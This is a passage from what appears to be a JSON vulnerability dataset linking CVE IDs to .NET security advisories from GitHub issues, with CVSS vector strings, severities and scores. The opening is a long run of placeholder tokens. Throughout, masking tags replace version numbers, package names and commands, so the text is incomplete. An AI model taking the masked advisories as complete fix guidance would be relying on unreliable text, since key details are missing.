CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG arm NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG arm | APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG arm NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG musl arm NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG musl NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG arm | APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG | APITAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG arm NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG musl arm NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG musl NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG arm | APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG arm NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG arm | APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG 
arm NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG musl arm | APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG musl arm NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG musl NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG arm | APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG arm NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG musl NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG arm NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG arm NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG arm | APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG arm NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG 
NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG",
  87564. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  87565. "severity": "MEDIUM",
  87566. "baseScore": 5.5,
  87567. "impactScore": 3.6,
  87568. "exploitabilityScore": 1.8
  87569. },
  87570. {
  87571. "CVE_ID": "CVE-2019-0657",
  87572. "Issue_Url_old": "https://github.com/dotnet/announcements/issues/97",
  87573. "Issue_Url_new": "https://github.com/dotnet/announcements/issues/97",
  87574. "Repo_new": "dotnet/announcements",
  87575. "Issue_Created_At": "2019-02-12T18:21:22Z",
  87576. "description": "Microsoft Security Advisory CVETAG : .NET Core Domain Spoofing Vulnerability. APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in .NET Core NUMBERTAG and NUMBERTAG This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. Microsoft is aware of a domain spoofing vulnerability in .NET Framework and .NET Core which causes the meaning of a URI to change when International Domain Name encoding is applied. An attacker who successfully exploited the vulnerability could redirect a URI. The security update addresses the vulnerability by disallowing certain Unicode characters from the URI. Discussion Discussion for this issue can be found at URLTAG NUMBERTAG APITAG APITAG Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. APITAG APITAG Affected software Any .NET Core NUMBERTAG or NUMBERTAG based application that uses the FILETAG package with a vulnerable version listed below. Package name | Vulnerable versions | Secure versions | | APITAG NUMBERTAG Any .NET Core NUMBERTAG or NUMBERTAG based application that uses the FILETAG package with a vulnerable version listed below. Package name | Vulnerable versions | Secure versions | | APITAG NUMBERTAG APITAG APITAG Advisory FAQ APITAG APITAG How do I know if I am affected? Applications that use APITAG APITAG is distributed as part of the .NET Core NUMBERTAG runtime. To check the currently installed runtimes, open a command prompt and run the APITAG command. If you have a NUMBERTAG or greater runtime installed, you'll see output like the following; ERRORTAG If your host version is NUMBERTAG and the highest APITAG runtime version is less than NUMBERTAG you're vulnerable to this issue. If your host version is NUMBERTAG and the highest NUMBERTAG APITAG runtime version is less than NUMBERTAG you're vulnerable to this issue. 
You will not see SDK versions if you have only installed the runtime. Applications not using APITAG The affected assembly is also available separately as a APITAG package. If you are not using APITAG you may still be affected if you are referencing the packages listed above. Direct dependencies Direct dependencies are discoverable by examining your csproj file. They can be fixed by editing the project file fixing direct dependencies or using APITAG to update the dependency. Transitive dependencies Transitive dependencies occur when you add a package to your project that in turn relies on another package. For example, if Contoso publishes a package APITAG which, in turn, depends on APITAG and you add the APITAG package to your project now your project has a direct dependency on APITAG and, because APITAG depends APITAG your application gains a transitive dependency on the APITAG package. Transitive dependencies are reviewable in two ways: In the Visual Studio Solution Explorer window, which supports searching. By examining the APITAG file contained in the obj directory of your project for csproj based projects The APITAG files are the authoritative list of all packages used by your project, containing both direct and transitive dependencies. There are two ways to view transitive dependencies. You can either use Visual Studio\u2019s Solution Explorer vs solution explorer , or you can review the APITAG file project assets json) . APITAG APITAG Using Visual Studio Solution Explorer To use Solution Explorer, open the project in Visual Studio, and then press Ctrl+; to activate the search in Solution Explorer. Search for the vulnerable package affected software and make a note of the version numbers of any results you find. For example, searching for APITAG in an example project that contains a package that takes a dependency on APITAG shows the following results in Visual Studio NUMBERTAG FILETAG The search results appear as a tree. 
In the previous results, you can see that a reference to APITAG version NUMBERTAG is discovered. Under the Dependencies node is a APITAG node. Under the APITAG node is the list of packages you have directly taken a dependency on and their versions. In screenshot, the application takes a direct dependency on APITAG . APITAG in turn has leaf nodes that list its dependencies and their versions. The APITAG package takes a dependency on a version of APITAG , that in turn takes a dependency on a version of APITAG . APITAG APITAG Manually reviewing FILETAG Open the FILETAG file from your project\u2019s obj directory in your editor. We suggest you use an editor that understands JSON and allows you to collapse and expand nodes to review this file. Visual Studio and Visual Studio Code provide JSON friendly editing. Search the FILETAG file for the vulnerable package affected software , using the format APITAG for each of the package names from the preceding table. If you find the assembly name in your search: Examine the line on which they are found, the version number is after the APITAG . Compare to the vulnerable versions table affected software . For example, a search result that shows APITAG is a reference to version NUMBERTAG of APITAG . If your FILETAG file includes references to the vulnerable package affected software , then you need to fix the transitive dependencies. If you have not found any reference to any vulnerable packages, this means either None of your direct dependencies depend on any vulnerable packages, or You have already fixed the problem by updating the direct dependencies. APITAG APITAG How do I fix the issue? Updating the version of APITAG If your host version is a NUMBERTAG host you must install version NUMBERTAG or later of the FILETAG , or corresponding FILETAG . If your host version is a NUMBERTAG you must install version NUMBERTAG or later of the FILETAG , or corresponding FILETAG . 
APITAG APITAG Fixing direct dependencies Open APITAG in your editor. If you're using Visual Studio, right click the project and choose Edit APITAG from the context menu, where projectname is the name of your project. Look for APITAG elements. The following shows an example project file: CODETAG The preceding example has a reference to the vulnerable package affected software , as seen by the single APITAG element. The name of the package is in the Include attribute. The package version number is in the Version attribute. The previous example shows a single direct dependency on APITAG version NUMBERTAG To update the version to the secure package, change the version number to the updated package version as listed on the table previously affected software . In this example, update APITAG to the appropriate fixed package number affected software for your major version. Save the csproj file. The example csproj now looks as follows: CODETAG If you're using Visual Studio and you save your updated csproj file, Visual Studio will restore the new package version. You can see the restore results by opening the Output window APITAG and changing the Show output from drop down list to Package Manager . If you're not using Visual Studio, open a command line and change to your project directory. Execute the dotnet restore command to restore the updated dependencies. Now recompile your application. If after recompilation you see a Dependency conflict warning , you must update your other direct dependencies to versions that take a dependency on the updated package. APITAG APITAG Fixing transitive dependencies If your transitive dependency review found references to the vulnerable package affected software , you must add a direct dependency to the updated package to your csproj file to override the transitive dependency. Open APITAG in your editor. 
If you're using Visual Studio, right click the project and choose Edit APITAG from the context menu, where projectname is the name of your project. Look for APITAG nodes, for example: CODETAG You must add a direct dependency to the updated version of the vulnerable package affected software by adding it to the csproj file. You do this by adding a new line to the dependencies section, referencing the fixed version. For example, if your search showed a transitive reference to a vulnerable APITAG version, you'd add a reference to the fixed package number affected software . CODETAG After you've added the direct dependency reference, save your csproj file. If you're using Visual Studio, save your updated csproj file and Visual Studio will restore the new package versions. You can see the restore results by opening the Output window APITAG and changing the Show output from drop down list to Package Manager . If you're not using Visual Studio, open a command line and change to your project directory. Execute the dotnet restore command to restore the new dependencies. Rebuilding your application Finally, you must rebuild your application, test, and redeploy. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core, please email details to EMAILTAG . Reports may qualify for the .NET Core Bug Bounty. Details of the .NET Core Bug Bounty including terms and conditions are at URLTAG URLTAG . Support You can ask questions about this issue on APITAG in the .NET Core or ASP.NET Core organizations. These are located at URLTAG and URLTAG The Announcements repo for each product ( URLTAG and URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. 
Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
  87577. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
  87578. "severity": "MEDIUM",
  87579. "baseScore": 5.9,
  87580. "impactScore": 3.6,
  87581. "exploitabilityScore": 2.2
  87582. },
  87583. {
  87584. "CVE_ID": "CVE-2021-1721",
  87585. "Issue_Url_old": "https://github.com/dotnet/announcements/issues/175",
  87586. "Issue_Url_new": "https://github.com/dotnet/announcements/issues/175",
  87587. "Repo_new": "dotnet/announcements",
  87588. "Issue_Created_At": "2021-02-09T18:15:20Z",
  87589. "description": "Microsoft Security Advisory CVETAG | .NET Core Denial of Service Vulnerability. Microsoft Security Advisory CVETAG | .NET Core Denial of Service Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in .NET NUMBERTAG NET Core NUMBERTAG and .NET Core NUMBERTAG This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. A denial of service vulnerability exists when creating HTTPS web request during NUMBERTAG certificate chain building. Discussion Discussion for this issue can be found at URLTAG TBD APITAG APITAG Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. APITAG APITAG Affected software Any .NET NUMBERTAG NET Core NUMBERTAG or .NET Core NUMBERTAG application running on .NET NUMBERTAG NET Core NUMBERTAG or .NET Core NUMBERTAG or lower, respectively. Please note that .NET Core NUMBERTAG is out of support and all applications should be updated to NUMBERTAG APITAG APITAG How do I know if I am affected? If you have a runtime or SDK with a version listed in affected software affected software , you're exposed to the vulnerability. APITAG APITAG How do I fix the issue? To fix the issue, please install the latest version of .NET NUMBERTAG NET Core NUMBERTAG or .NET Core NUMBERTAG If you have installed one or more .NET Core SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio, which will also update your .NET Core SDKs. You can list the versions you have installed by running the APITAG command. 
You should see an output like the following: ERRORTAG If you're using .NET NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG from FILETAG If you're using .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or NUMBERTAG for Visual Studio NUMBERTAG or later) from FILETAG If you're using .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or NUMBERTAG from FILETAG .NET NUMBERTAG NET Core NUMBERTAG and .NET Core NUMBERTAG updates are also available from Microsoft Update. To access this either type APITAG for updates\" in your Windows search, or open Settings, choose Update & Security and then click Check for Updates. Once you have installed the updated runtime or SDK, restart your apps for the update to take effect. Additionally, if you've deployed self contained applications URLTAG targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core or .NET NUMBERTAG please email details to EMAILTAG . Reports may qualify for the Microsoft .NET Core & .NET NUMBERTAG Bounty. Details of the Microsoft .NET Bounty Program including terms and conditions are at APITAG . Support You can ask questions about this issue on APITAG in the .NET APITAG organization. The main repos are located at URLTAG and URLTAG The Announcements repo ( URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. 
In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
  87590. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  87591. "severity": "MEDIUM",
  87592. "baseScore": 6.5,
  87593. "impactScore": 3.6,
  87594. "exploitabilityScore": 2.8
  87595. },
  87596. {
  87597. "CVE_ID": "CVE-2021-1721",
  87598. "Issue_Url_old": "https://github.com/dotnet/runtime/issues/48067",
  87599. "Issue_Url_new": "https://github.com/dotnet/runtime/issues/48067",
  87600. "Repo_new": "dotnet/runtime",
  87601. "Issue_Created_At": "2021-02-09T18:30:29Z",
  87602. "description": "Microsoft Security Advisory CVETAG | .NET Core Denial of Service Vulnerability. Microsoft Security Advisory CVETAG | .NET Core Denial of Service Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in .NET NUMBERTAG NET Core NUMBERTAG and .NET Core NUMBERTAG This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. A denial of service vulnerability exists when creating HTTPS web request during NUMBERTAG certificate chain building. Announcement Announcement for this issue can be found at URLTAG APITAG APITAG Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. APITAG APITAG Affected software Any .NET NUMBERTAG NET Core NUMBERTAG or .NET Core NUMBERTAG application running on .NET NUMBERTAG NET Core NUMBERTAG or .NET Core NUMBERTAG or lower, respectively. Please note that .NET Core NUMBERTAG is out of support and all applications should be updated to NUMBERTAG APITAG APITAG How do I know if I am affected? If you have a runtime or SDK with a version listed in affected software affected software , you're exposed to the vulnerability. APITAG APITAG How do I fix the issue? To fix the issue, please install the latest version of .NET NUMBERTAG NET Core NUMBERTAG or .NET Core NUMBERTAG If you have installed one or more .NET Core SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio, which will also update your .NET Core SDKs. You can list the versions you have installed by running the APITAG command. 
You should see an output like the following: ERRORTAG If you're using .NET NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG from FILETAG If you're using .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or NUMBERTAG for Visual Studio NUMBERTAG or later) from FILETAG If you're using .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or NUMBERTAG from FILETAG .NET NUMBERTAG NET Core NUMBERTAG and .NET Core NUMBERTAG updates are also available from Microsoft Update. To access this either type APITAG for updates\" in your Windows search, or open Settings, choose Update & Security and then click Check for Updates. Once you have installed the updated runtime or SDK, restart your apps for the update to take effect. Additionally, if you've deployed self contained applications URLTAG targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core or .NET NUMBERTAG please email details to EMAILTAG . Reports may qualify for the Microsoft .NET Core & .NET NUMBERTAG Bounty. Details of the Microsoft .NET Bounty Program including terms and conditions are at APITAG . Support You can ask questions about this issue on APITAG in the .NET APITAG organization. The main repos are located at URLTAG and URLTAG The Announcements repo ( URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. 
In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
  87603. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  87604. "severity": "MEDIUM",
  87605. "baseScore": 6.5,
  87606. "impactScore": 3.6,
  87607. "exploitabilityScore": 2.8
  87608. },
  87609. {
  87610. "CVE_ID": "CVE-2021-41355",
  87611. "Issue_Url_old": "https://github.com/dotnet/runtime/issues/60301",
  87612. "Issue_Url_new": "https://github.com/dotnet/runtime/issues/60301",
  87613. "Repo_new": "dotnet/runtime",
  87614. "Issue_Created_At": "2021-10-12T17:02:13Z",
  87615. "description": "Microsoft Security Advisory CVETAG | .NET Core Information Disclosure Vulnerability. Microsoft Security Advisory CVETAG | .NET Core Information Disclosure Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in .NET. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. An Information Disclosure vulnerability exists in .NET where APITAG may send credentials in plain text on Linux. Announcement Announcement for this issue can be found at URLTAG APITAG APITAG Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. APITAG APITAG Affected software Any .NET application that uses APITAG with a vulnerable version listed below on systems based on Linux. Package name | Vulnerable versions | Secure versions | | APITAG NUMBERTAG or lower NUMBERTAG APITAG APITAG How do I know if I am affected? If you are using a package version listed in affected software affected software , you're exposed to the vulnerability. APITAG APITAG How do I fix the issue? To fix the issue, please update to the latest version URLTAG of the affected software affected software . Other Information Reporting Security Issues If you have found a potential security issue in .NET, please email details to EMAILTAG . Reports may qualify for the Microsoft .NET Core & .NET NUMBERTAG Bounty. Details of the Microsoft .NET Bounty Program including terms and conditions are at APITAG . Support You can ask questions about this issue on APITAG in the .NET APITAG organization. The main repos are located at URLTAG and URLTAG The Announcements repo ( URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. 
Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
  87616. "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
  87617. "severity": "MEDIUM",
  87618. "baseScore": 5.7,
  87619. "impactScore": 3.6,
  87620. "exploitabilityScore": 2.1
  87621. },
  87622. {
  87623. "CVE_ID": "CVE-2020-0606",
  87624. "Issue_Url_old": "https://github.com/dotnet/announcements/issues/149",
  87625. "Issue_Url_new": "https://github.com/dotnet/announcements/issues/149",
  87626. "Repo_new": "dotnet/announcements",
  87627. "Issue_Created_At": "2020-01-14T18:01:12Z",
  87628. "description": "Microsoft Security Advisory CVETAG : .NET Core Remote Code Execution Vulnerability. Microsoft Security Advisory CVETAG : .NET Core Remote Code Execution Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in .NET Core. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. Microsoft is aware of a remote code execution vulnerability exists in .NET software when the software fails to check the source markup of a file. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. Exploitation of the vulnerability requires that a user open a specially crafted file with an affected version of .NET Core. In an email attack scenario, an attacker could exploit the vulnerability by sending the specially crafted file to the user and convincing the user to open the file. The security update addresses the vulnerability by correcting how .NET Core checks the source markup of a file. Discussion Discussion for this issue can be found at URLTAG TBD APITAG APITAG Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. APITAG APITAG Affected software Any .NET Core NUMBERTAG application running on .NET Core NUMBERTAG or NUMBERTAG APITAG APITAG How do I know if I am affected? If you have a runtime or SDK with a version listed in affected software affected software you are exposed to the vulnerability. APITAG APITAG How do I fix the issue? To fix the issue please install the latest version of .NET Core. If you have multiple versions of .NET Core installed you will need to install multiple runtimes, or SDKs depending on what you have installed. You can list the versions you have installed by running the APITAG command. 
You will see output like the following; ERRORTAG For machines running .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG from FILETAG For machines running .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG from FILETAG If you have both NUMBERTAG and NUMBERTAG installed, you need to install the updates for both versions. Once you have installed the updated runtime or SDK, restart your apps for the update to take effect. Additionally, if you've deployed self contained applications URLTAG targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core, please email details to EMAILTAG . Reports may qualify for the .NET Core Bug Bounty. Details of the .NET Core Bug Bounty including terms and conditions are at URLTAG URLTAG . Support You can ask questions about this issue on APITAG in the .NET Core APITAG organization. The main repos are located at URLTAG and URLTAG The Announcements repo ( URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. 
Acknowledgments Soroush Dalili ( MENTIONTAG URLTAG External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
  87629. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  87630. "severity": "HIGH",
  87631. "baseScore": 8.8,
  87632. "impactScore": 5.9,
  87633. "exploitabilityScore": 2.8
  87634. },
  87635. {
  87636. "CVE_ID": "CVE-2018-0875",
  87637. "Issue_Url_old": "https://github.com/dotnet/announcements/issues/62",
  87638. "Issue_Url_new": "https://github.com/dotnet/announcements/issues/62",
  87639. "Repo_new": "dotnet/announcements",
  87640. "Issue_Created_At": "2018-03-13T17:01:52Z",
  87641. "description": "Microsoft Security Advisory CVETAG : Hash Collison can cause Denial of Service. Microsoft Security Advisory CVETAG : Hash Collison can cause Denial of Service Executive Summary Microsoft is releasing this security advisory to provide information about a vulnerability in the public versions of .NET Core NUMBERTAG and NUMBERTAG including other minor and patch releases). This advisory also provides guidance on what developers can do to update their applications correctly. Microsoft is aware of a security vulnerability in the public versions of .NET Core where a malicious file or web request could cause a denial of service APITAG attack. System administrators are advised to update their .NET Core runtimes to versions NUMBERTAG or NUMBERTAG Developers are advised to update their .NET Core SDK to versions NUMBERTAG or NUMBERTAG Discussion Use TBD for discussion of this advisory. Mitigation Factors None Affected Software Any application running against .NET Core NUMBERTAG or lower versions NUMBERTAG or lower minor versions or NUMBERTAG or lower minor versions is affected. Advisory FAQ How do I know if I am affected? Any application running against .NET Core NUMBERTAG or lower versions NUMBERTAG or lower minor versions or NUMBERTAG or lower minor versions is affected. A complete list of runtimes can be discovered by performing a directory listing in the install root directories. The default root directories are listed in the following table: | Operating System | Location | | | | | Windows | APITAG | | APITAG | APITAG | | Supported Linux platforms | APITAG | Each runtime version is installed in its own directory, where the directory name is the version number. If you don't have a directory for NUMBERTAG and NUMBERTAG then any applications targeting the respective major/minor versions NUMBERTAG or NUMBERTAG or NUMBERTAG of .NET Core are vulnerable. 
